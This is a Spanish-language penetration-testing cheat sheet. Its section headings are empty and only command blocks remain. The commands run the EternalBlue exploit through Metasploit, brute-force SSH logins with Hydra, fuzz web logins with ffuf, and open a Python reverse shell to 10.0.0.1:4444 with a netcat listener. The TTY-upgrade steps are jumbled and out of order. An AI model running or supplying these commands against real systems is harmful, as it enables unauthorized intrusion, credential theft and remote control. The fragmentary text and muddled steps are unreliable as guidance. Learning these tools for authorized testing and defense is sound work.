CVE (Common Vulnerabilities and Exposures):
CVSS (Common Vulnerability Scoring System):
Fuentes principales:
# Búsqueda en Metasploit
msf> search cve:2021-44228
# Búsqueda en SearchSploit
searchsploit -c CVE-2021-44228
# Base de datos NVD
https://nvd.nist.gov/vuln/search
Por impacto potencial:
Elementos clave:
Proceso sistemático:
Componentes principales:
Comandos esenciales:
# Iniciar Metasploit
msfconsole
# Búsqueda de módulos
search type:exploit platform:windows ms17-010
# Uso de módulos
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
exploit
Recursos comunes:
Ejemplos prácticos:
# FFuf para fuzzing web
ffuf -w wordlist.txt -u http://target.com/FUZZ
ffuf -w users.txt:W1,pass.txt:W2 -u http://target.com/login -X POST -d "user=W1&pass=W2"
# Hydra para SSH
hydra -l admin -P rockyou.txt ssh://target.com
hydra -L users.txt -P passes.txt ssh://target.com -t 4
Tipos principales:
# Ejemplo de reverse shell en Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Listener con netcat
nc -lvnp 4444
Técnicas comunes:
# Obtener TTY completa
python -c 'import pty; pty.spawn("/bin/bash")'
# Configuración de terminal
export TERM=xterm
stty raw -echo; fg
# Después de 'stty raw -echo; fg':
# 1. Presionar Enter
# 2. Presionar Ctrl + Z
# 3. stty raw -echo; fg
# 4. Presionar Enter dos veces
Principios fundamentales: